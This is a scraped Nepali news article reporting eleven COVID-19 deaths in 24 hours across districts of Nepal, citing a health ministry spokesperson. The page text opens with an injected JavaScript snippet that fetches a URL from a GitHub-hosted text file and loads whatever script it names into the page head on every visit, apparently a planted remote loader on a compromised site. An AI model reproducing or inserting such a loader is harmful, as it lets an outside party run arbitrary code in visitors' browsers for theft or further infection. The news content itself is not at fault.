;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोरोनाबाट पछिल्लो २४ घण्टामा ११ जनाको मृत्यु – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • कोरोनाबाट पछिल्लो २४ घण्टामा ११ जनाको मृत्यु
समाचार

कोरोनाबाट पछिल्लो २४ घण्टामा ११ जनाको मृत्यु

कोरोनाबाट मृत्यु

भदौ ०५,

काठमाडौँ । नेपालमा पछिल्लो २४ घण्टामा थप ११ जना कोरोना संक्रमितको मृत्यु भएको छ। स्वास्थ्य तथा जनसंख्या मन्त्रालयको नियमित प्रेस व्रिफ्रिङका क्रममा मन्त्रालयका प्रवक्ता डा. जागेश्वर गाैतमले पछिल्लो २४ घण्टामा एक महिला र १० पुरुष गरी ११ जना कोरोना संक्रमितको मृत्यु भएको जानकारी दिए।

प्रवक्ता डा. गाैतमका अनुसार माेरङ, पर्सा, बारा, काठमाडाैँ, ललितपुर, मकवानपुर, चितवन, सप्तरी, सर्लाही, दाेलखा र प्यूठानमा एक–एक जनाको कोरोनाबाट मृत्य भएको हो। यससँगै नेपालमा कोरोनाबाट ज्यान गुमाउनेको संख्या १३७ पुगेको छ। file Photo

फेसबुक प्रतिक्रियाहरु